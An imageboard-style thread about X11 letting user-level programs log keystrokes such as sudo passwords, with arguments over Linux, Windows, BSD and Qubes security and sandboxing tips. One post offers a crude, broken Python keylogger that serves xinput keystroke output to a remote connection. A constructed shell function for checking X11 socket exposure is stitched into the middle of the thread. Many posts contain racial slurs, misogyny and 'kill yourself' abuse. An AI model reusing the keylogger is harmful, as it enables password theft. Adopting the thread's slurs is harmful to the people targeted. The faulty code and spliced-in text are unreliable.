I've been using linux for about 7 years now and I've seen no mention that entering your password in a sudo prompt in a terminal emulator is bad practice. (Although I started in Ubuntu, so they might just be cucks) From what I'm seeing, it would be easy for anyone that has access at my user level to quickly get root access and install rootkits and shit.
Welcome to the shitshow that is X11. Enjoy your stay.
Leo Gray
Linux, not even once
Jayden Adams
>implying it's not just as trivial to set a global keyboard input hook and intercept keystrokes on Windows
Matthew Morris
UNIX like systems aren't designed to be secure, what did you expect? Every retard can write a simple keylogger for linux, Python example:
    import socket
    import subprocess
    host = ''
    port = 1025
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, port))
    s.listen(1)
    conn, addr = s.accept()
    proc = subprocess.Popen(['xinput'], shell=True, stdout= subprocess.Pipe, stderr = subprocess.Pipe)
    conn.send(proc.stdout.read())
    i = conn.recv(1024)
    proc = subprocess.Popen(['xinput test'+i+' > .log'])
    # some shit when to send .log file
    x = open('.log', 'r').read()
    x.close()
    conn.send(x)
Christian Bennett
OP here, So what should I do? Just Ctrl-Alt-F2 and run all my root stuff in a real terminal, is that even secure?
Evan Rogers
If there's only me and root,why should I care? Am I missing something? It's not as though I'd keylog myself after all.
Christian Baker
Any program could keylog and upload it to a remote server, the bandwidth wouldn't be high enough to notice since it's just key codes. If you're running Google Chrome or some kind of shitty proprietary software then you would be easy to hack. I happen to run a fair number of games on wine, myself
Ayden Peterson
this It is built into the OS, not even botnet meme
it is just a bit of code around SetWindowsHookEx()
Jaxon Martin
Remote server was the wrong thing. I mean that the keylogger could sniff the root password from su or sudo and then use it to do whatever the fuck it wants. Maybe replace ps so that it doesn't show up on the process list and then just lodge itself as far in your anus as it can without you noticing.
Robert Jenkins
I tried writing a windoze keylogger using that once, it worked but murdered performance for some reason. Just having an "empty" global keyboard hook made the entire system slow down noticeably, I mean everything, like explorer.exe was being slowly but powerfully fucked in the ass by all the legs of a giant tarantula
-1/10 wouldn't try and keylog again
David Scott
once someone who isn't a low-tech has superuser rights on your machine you are basically fucked, because kernel modules are now pretty easy to install, no need to replace ps, manipulations on kernel level are pretty much undetectable
Carter Allen
yeah Global hooks are SLOW, it's better to do a per application hook and maybe have a list of common programs, but the point was it's very easy to do keyloggers in windows as well. but I am not defending X11 at all, this shit is retarded
Ryder Watson
>article written by a girl
Jeremiah Gomez
> not knowing who this is she probably has more knowledge of technology than you will ever have, fucking tard, search for Qubes OS and blue pill rootkit you pleb
Levi Long
>Qubes OS
>homepage plastered with quotes from nobodies and muh privacy advocates
dropped
>blue pill
>named blue pill
>"it's 100% undetectable"
>refuses to let researchers try and detect it
>refuses to even enter competition without $384,000 "funding"
opinion discarded
Lincoln Reed
either this is blatant bait or you're legitimately retarded it's a shame that with neo-Sup Forums I can no longer tell which one it is
Cameron Howard
This is one reason why I run my web browser in a VM (with no shared clipboard).
Jason Long
It looks like qemu and xen have made some progress on passing a graphics card into the VM, so I might put all my games in that. Hopefully that doesn't make an even bigger security risk
Brandon Ortiz
Just don't use untrustworthy software, problem solved.
Joseph Price
If it's a dedicated graphics card for the VM you should be okay. I only have one graphics card so I disable 3D graphics and 2D acceleration for the VM to stop it reading GPU ram outside the VM.
Jonathan Phillips
Pretty much all software is untrustworthy when it's getting input from the internet. How much software do you use that's formally proven correct? Isolation is an important part of defense in depth. Better a single app gets owned than your whole system.
Chase Myers
Just use an EFF certified distro and never install any proprietary software on it. Compile everything on it from source, including the compiler. Just compile the compiler by hand using assembly code and while you're at it double check that there are no binary blobs in any of the packages that you're compiling. Also use open source hardware so that the bios chips have no binary blobs. I was actually expecting that reply before I made the thread.
Brayden Rivera
>EFF certified distro
Levi Roberts
I guarantee you are using software with exploitable bugs right now. Access to the source is necessary but not sufficient for trustworthy software.
Charles Bennett
everyone of us is you nigger
Dominic Rodriguez
>shitting on Joanna lmao what a loser
Jaxon Carter
Web browser attack surface is too large for your claim to be believable, even with major features like Javascript disabled (which is a common sense precaution).
Hudson Martinez
>Chromium, open source but hasn't been fully audited; had a binary blob snuck into the code randomly without distro devs noticing
>OpenSSL, open source and audited but Heartbleed still happened anyway
>Bash, shellshock vulnerability was in the code for 25 years before being noticed
Point taken.
Charles Parker
Pls roll library girl
Jonathan Williams
Dammit
Leo Hall
roll
Noah Collins
>website stuck in infinite loop unless cookies are allowed Literally a botnet. Please don't ever post that shit here again.
Hunter Nelson
rolling for a cute waifu
Xavier Bell
fuck this shit. i'm killing my self right now.
Nolan Sanchez
...
Andrew Barnes
>Didn't even notice
>Disables cookies to test for myself
>Loops like you said
>Comes back to reply
>Sup Forums loses its shit because cookies are disabled
Thanks, Internet
Jonathan Lewis
>>blue pill >>named blue pill >>"it's 100% undetectable" >>refuses to let researchers try and detect it >>refuses to even enter competition without $384,000 "funding" >t-this is bait >please sleep with me, I defended your honor White knights should kill themselves.
Gavin Torres
>conveniently leaving out the fact that it was later open sourced drink bleach
Jacob Walker
>gets flak from everyone who isn't a pathetic white knight >>I'll open source it now Kill yourself.
Bentley Lewis
>still no proper argument against the security model of Qubes i want summerfags to leave
Evan Ramirez
yeah after she gave up trying to milk it for money
Matthew Evans
>Unzips popcorn
Juan Wood
>security model of Qubes
The model is fine. The fact that it's based off Linux isn't. Security in Linux is a fucking joke, and GRSec makes it only slightly less shitty. You only get the unstable version of it, and even if you use the stable version the devs are such massive dumb fucks that they'll ban you if you point out any bugs in it.
Michael Young
>Security in Linux is a fucking joke butthurt windoze fagcunt detected
Brandon King
Windows security is better than Linux' these days. Sorry if your ass gets blasted. The only reason why Windows exploits are a big deal is because there are more people using it than 1 smelly, disgusting neckbeard.
Isaiah Stewart
As opposed to what, Win/Mac?
The *BSDs are usually pretty good at being secure OOTB, but they suffer from the exact same Xorg isolation issues as Linux in a desktop environment, plus it's fucking BSD. A hardened Linux distribution using grsec and SELinux (NSA botnet) is about the best security you'll be able to get, short of using Qubes.
>hur durdurdur
Theo even says Linux is dogshit compared to Windows. OpenBSD is the ONLY unix-like OS that actually forces good security settings. Windows is getting better, but Linux is still fucking garbage because it's written for usability and performance first.
>A hardened Linux distribution using grsec
GRSec is shit. The fucking devs throw tantrums when people point out bugs involving a fucking unsigned check for less than fucking zero. Have fun getting the stable patches by the way, I hope you're a giant corporation with tens of thousands to throw at it.
Brody Parker
That doesn't solve the problem with Unix and all Unix look-alikes: Security isn't in their design, it's an add-on made with duct tape.
Connor Torres
>Amazing Grace isn't in that picture
Michael Thomas
>Theo says so Theo says a lot of things. Citing him without actually citing him doesn't count, and frankly makes you look dumb.
Mason Smith
you're severely misguided if you actually believe Windows is improving security-wise. At least on Linux, I have the luxury of e.g. disabling ptrace using SELinux. Good luck doing the same thing with OpenProcess() on Windows.
Anthony Reyes
>source: my arse How cute, believing in the security of linux… Where the developers actively try to suppress info about new bugs… Where you can say that a group of sane developers is a "bunch of masturbating monkeys" and saving your arse, and also, being celebrated by your own incompetence.
Andrew Harris
please not blue hair
Grayson Perry
>complains about lack of source >doesn't cite sources in his dubious bait-like reply Look boys, we caught ourselves yet another retard.
Ian Williams
>doesn't cite sources It's common fucking knowledge about Linus' stance on security.
Also can you get any more butthurt over one of Torvalds' remarks? As if fucking Theo, of all people, hasn't made dickish remarks about Linux.
Justin Ward
>As if fucking Theo, of all people, hasn't made dickish remarks about Linux. Because Linus doesn't take security seriously and Linux' security is a fucking joke.
Connor Rivera
>asked to cite sources >"it's common knowledge guys xD"
A bunch of 12 year olds whining about papa torvalds' temper doesn't count as a source, dick-skin.
See, you're not citing what you know you should be citing, i.e. your bullshit bait. None of these sources prove any of your arguments thus far.
tl;dr you can't debate for shit and you're a failure, no wonder your mother hates you
Zachary Allen
taking quotes out of context: >"one reason I refuse to bother with the whole security circus is that I think it glorifies—and thus encourages—the wrong behavior. It makes 'heroes' out of security people, as if the people who don't just fix normal bugs aren't as important. In fact, all the boring normal bugs are way more important, just because there's a lot more of them."
wew lad
Jayden Morgan
>debate This isn't even a debate. This is you shilling for Linux' security, which is fucking garbage. Whatever lets you sleep at night I guess.
John Morris
>shilling >whatis English comprehension I haven't actually said a word in its favour, I'm just poking you with a stick because it's funny. Stay mad.
Jeremiah Morris
>A bunch of 12 year olds whining about papa torvalds' temper doesn't count as a source, dick-skin. You didn't read the mail list right? They explain in there what caused that Linus sprouted that shit out of this mouth. Linus can say anything he wants, but we cannot permit that he gets congratulated to saving his ass, specially in matters so sensible as security.
Owen Wright
>This isn't even a debate. It is and you haven't managed to provide a reasoning to back up your claims.
>"This is you shilling for Linux' security, which is fucking garbage." >Attacking the person instead of addressing the topic.
>Whatever lets you sleep at night I guess. Ok, but at least you didn't convince me of anything.
Oliver Robinson
I read enough of it to know that not a single person in that thread had any idea what they were talking about. You know, like you.
By carefully analysing your misuse of the English language, I have ascertained to with a 98.999999% probability that you are pic related.
David Murphy
>I read enough of it to know that not a single person in that thread had any idea what they were talking about. You know, like you. Okey, I'll accept that you're ass blasted enough to refuse to read the complete mail thread.
By carefully analysing your misuse of the English language, I have ascertained to with a 98.999999% probability that you are pic related. >careful analysis >he can't distinguish the gramatical errors between Pedros and Pajeets :^)
Adam Martinez
>thinks there's any difference between nigger flavours
Easton Taylor
How does a nigger taste?
Owen Harris
Like salted garbage
Zachary Bennett
>he knows the flavor of the garbage
Tyler Sanders
There is a reason selinux does not let users without the sysadmin role su or sudo
I have never used sudo, either way. I just su.
Jack Long
Windows works the same way you dumbfuck
Elijah Allen
you can do x11 isolation with xpra and firejail (firejail allows you to select additional permissions and to prevent x11 socket mappings, basically all you need to do is set your firejail config right, then add a symlink to firejail named the same as the program you want to invoke in your PATH). It will work as long as your program doesn't need internet access, otherwise you can't block out the socket mapping (for the time being) but you can otherwise prevent input leakage.
that can't intercept password uac prompt in windows.
Michael Ward
Yes.
The problem here isn't Linux but the X Window manager.
Sebastian Jackson
4u
Evan Anderson
su would have the exact same problem, the keys are being logged at the X11 level, so by the time the keypress has gotten to the terminal it's too late.
See
Nathan Ortiz
I see
Christian Clark
Pls be qt3.14
Jace Bell
rollan
Caleb Adams
I talked about every UNIX like system being unsecure you nigger, this also includes windows, the example won't work on windows as long as bash is not installed
Blake Johnson
Got Joanna
Christopher Butler
I saw a mention of firejail on the installgentoo wiki just before I made this thread, I guess I'll have to actually read that now
I was thinking that I could just install qubes at this point; or since qubes doesn't support VGA passthrough but xen and qemu apparently do (experimentally, at least), I could make a ghetto qubes setup with a bunch of virtual machines. I've got like 10TB of hard drives anyway, so redundant filesystems wouldn't be an issue for space.
Assuming that I can hold each VM in a file (eg. .vmdk) instead of giving them direct hard drive access
Bentley Kelly
>The sandbox replaces the regular X11 server with Xpra or Xephyr server. This prevents X11 keyboard loggers and screenshot utilities from accessing the main X11 server. >firejail.wordpress.com/documentation-2/x11-guide/
looks like that would work
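A check for the limitation discussed in the firejail posts above, added here as an example that is not part of the thread or of firejail itself: it reports whether the host X server's socket is still reachable from wherever it is run, so it can be executed inside a sandbox to confirm the isolation. The function names, arguments and the sample socket table are assumptions made for illustration, and the sample table is constructed.

```shell
#!/bin/sh
# Added example: which routes to the host X server are reachable from here?
# usage: x11_exposure DISPLAY_NUM [UNIX_TABLE] [SOCKET_DIR]
# UNIX_TABLE defaults to /proc/net/unix, SOCKET_DIR to /tmp/.X11-unix.
# Prints "abstract" and/or "filesystem", or "none"; returns 0 only for "none".
x11_exposure() {
    disp=$1
    table=${2:-/proc/net/unix}
    sockdir=${3:-/tmp/.X11-unix}
    found=0

    # Abstract sockets are listed with a leading "@". They belong to the
    # network namespace, not the filesystem, so hiding /tmp does not hide
    # them; only a separate network namespace does.
    if awk -v want="@/tmp/.X11-unix/X$disp" \
        'NR > 1 && $8 == want { hit = 1 } END { exit !hit }' "$table"
    then
        echo "abstract"
        found=1
    fi

    # The filesystem socket is reachable whenever its path is visible in
    # this mount namespace.
    if [ -S "$sockdir/X$disp" ]; then
        echo "filesystem"
        found=1
    fi

    [ "$found" -eq 0 ] && echo "none"
    return "$found"
}

# Constructed sample of /proc/net/unix for a process that shares the host
# network namespace: the host server on display :0 is still listed.
sample_table() {
    cat <<'EOF'
Num       RefCount Protocol Flags    Type St Inode Path
0000000000000000: 00000002 00000000 00010000 0001 01 20481 @/tmp/.X11-unix/X0
0000000000000000: 00000002 00000000 00010000 0001 01 31007 @/tmp/.X11-unix/X100
0000000000000000: 00000003 00000000 00000000 0001 03 18822 /run/dbus/system_bus_socket
EOF
}
```

Run `x11_exposure` with the host display number from inside the sandbox; `abstract` in the output means the sandbox still shares the network namespace of the host X server, which is the case the post above describes for programs that need internet access.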
Daniel Moore
Daily Reminder.
Hunter Richardson
Qubes is extremely buggy. For example, try putting a usb and mounting it on a vm, then removing the usb. The vm manager will crash. Now in the vm in which you mounted the usb, unmount it with umount. The vm will crash.
Start afresh, and this time umount in the vm before pulling the USB out. Press "unmount" in the device menu of the vm manager menu. The vm manager will crash and so will the vm.
When trying to start vm's, they fail to start with no stated reason about 2/10 times (others report up to 50% failure rate).
Moreover, the whole thing runs on fedora garbage, and it and systemd have already caused them many problems (you can google it).
Overall, it's a very unprofessional project in my experience, despite the good intentions.
Luis Butler
Was anybody really expecting anything different? It was thrown together by people jumping on the muh security bandwagon, for people jumping on the muh security bandwagon.
It's all Snowden's fault. The day the news mentions in passing that he's been murdered or suffered a horrific "accident" is the day I stand and salute my TV.
Lucas Cox
How does Wayland fare against this stuff?
Henry Robinson
>It's all the NSA's fault. The day the news mentions in passing that the head of the NSA's been murdered or suffered a horrific "accident" is the day I stand and salute my TV. fixed You're complaining because everyone is paranoid, why not fix it at the source?